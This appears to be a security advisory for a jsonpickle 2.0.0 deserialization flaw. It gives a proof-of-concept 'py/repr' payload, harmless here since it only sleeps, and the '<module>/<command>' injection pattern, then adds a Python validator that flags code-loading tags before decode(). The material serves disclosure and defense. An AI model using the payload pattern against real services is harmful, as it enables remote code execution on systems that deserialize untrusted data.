
# Exploit Title: python jsonpickle 2.0.0 - Remote Code Execution
# Date: 24-2-2021
# Vendor Homepage: https://jsonpickle.github.io
# Exploit Author: Adi Malyanker, Shay Reuven
# Software Link: https://github.com/jsonpickle/jsonpickle
# Version: 2.0.0
# Tested on: windows, linux

# Python is an open source language. The jsonpickle module is provided to convert objects into a serialized form,
# and later recover the data back into an object. decode() is used to deserialize serialized strings.

# If malicious data is deserialized, it will execute arbitrary Python commands. It is also possible to make system() calls.
# The problem is in the inner function loadrepr, which eval()s each serialized string that contains "py/repr".

# The vulnerability exists from the first version till the current version, for backward compatibility. No patch is provided yet.

# The payload was found during our research on deserialization functions.

# The pattern should be:
# {..{"py/repr": "<the module to import>/<the command to be executed>"}..}

# example:

import jsonpickle

# "time" is the module loadrepr imports; "time.sleep(10)" is the expression it passes to eval().
# A 10 second delay is used here as a harmless, observable proof of execution.
malicious = '{"1": {"py/repr": "time/time.sleep(10)"}, "2": {"py/id": 67}}'

# the command on the server side
some_parameter = jsonpickle.decode(malicious)
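The advisory shows that any "py/repr" entry reaching jsonpickle.decode() is turned into an import plus an eval(). The defensive counterpart is to inspect untrusted input before it is handed to decode(). The following validator is an added example written for this page, not code from the advisory or from the jsonpickle project: it parses the document with the standard json module, walks every nested dict and list, and reports every key that would drive code loading on decode. "py/repr" is the tag from the advisory; "py/reduce", "py/function" and "py/type" are assumed additions that also import or execute code, and "py/object" is flagged unless the class name it carries is on a caller-supplied allowlist, because that tag is how ordinary jsonpickle instances are encoded and blocking it outright would break legitimate traffic. The module/expression split mirrors the "<module>/<command>" pattern the advisory describes. The sample payloads are the advisory's own malicious string and a constructed benign one.

```python
import json
from typing import Any, Dict, FrozenSet, Iterator, List, Tuple

# Tags that make jsonpickle import a module or run code while decoding.
# "py/repr" is the tag from the advisory; the others are assumed to belong
# here because they also reconstruct callables or classes from untrusted names.
CODE_LOADING_TAGS = ("py/repr", "py/reduce", "py/function", "py/type")

# Tag used for ordinary class instances; safe only for classes we expect.
OBJECT_TAG = "py/object"


def split_repr(value: str) -> Tuple[str, str]:
    """Split a py/repr value "<module>/<expression>" into its two parts.

    This is the shape the advisory documents; "time/time.sleep(10)" yields
    ("time", "time.sleep(10)").
    """
    module, _, expression = value.partition("/")
    return module, expression


def _walk(node: Any, path: str) -> Iterator[Tuple[str, str, Any]]:
    """Yield (json_path, tag, value) for every py/ tag found anywhere in node."""
    if isinstance(node, dict):
        for key, val in node.items():
            if isinstance(key, str) and key.startswith("py/"):
                yield path, key, val
            yield from _walk(val, f"{path}.{key}")
    elif isinstance(node, list):
        for index, item in enumerate(node):
            yield from _walk(item, f"{path}[{index}]")


def audit_payload(raw: str, allowed_objects: FrozenSet[str] = frozenset()) -> List[Dict[str, str]]:
    """Return one finding per tag that would load code if raw were passed to jsonpickle.decode().

    Findings for py/repr carry the module that would be imported and the
    expression that would be eval()ed, which is what an alert should log.
    py/object entries are only reported when the class is not allowlisted.
    """
    findings: List[Dict[str, str]] = []
    for path, tag, val in _walk(json.loads(raw), "$"):
        if tag in CODE_LOADING_TAGS:
            entry = {"path": path, "tag": tag}
            if tag == "py/repr" and isinstance(val, str):
                entry["module"], entry["expression"] = split_repr(val)
            findings.append(entry)
        elif tag == OBJECT_TAG and val not in allowed_objects:
            findings.append({"path": path, "tag": tag, "class": str(val)})
    return findings


def safe_to_decode(raw: str, allowed_objects: FrozenSet[str] = frozenset()) -> bool:
    """True only when no code-loading tag (or unexpected class) is present."""
    return not audit_payload(raw, allowed_objects)


# The payload from the advisory above.
MALICIOUS = '{"1": {"py/repr": "time/time.sleep(10)"}, "2": {"py/id": 67}}'

# Constructed benign document: plain JSON plus an allowlisted instance tag.
BENIGN = '{"user": "alice", "prefs": {"py/object": "app.models.Prefs", "theme": "dark"}}'
ALLOWED = frozenset({"app.models.Prefs"})


if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS), ("benign", BENIGN)):
        verdict = "reject" if not safe_to_decode(doc, ALLOWED) else "accept"
        print(label, verdict, audit_payload(doc, ALLOWED))
```

Run this gate on the raw string before calling jsonpickle.decode(); the findings list gives the path, the module that would have been imported and the expression that would have been eval()ed, which is the detail worth recording in a detection log. The allowlist for py/object should be the exact set of classes the application expects to receive, since an unpickler that accepts arbitrary class names has the same trust problem in a different form.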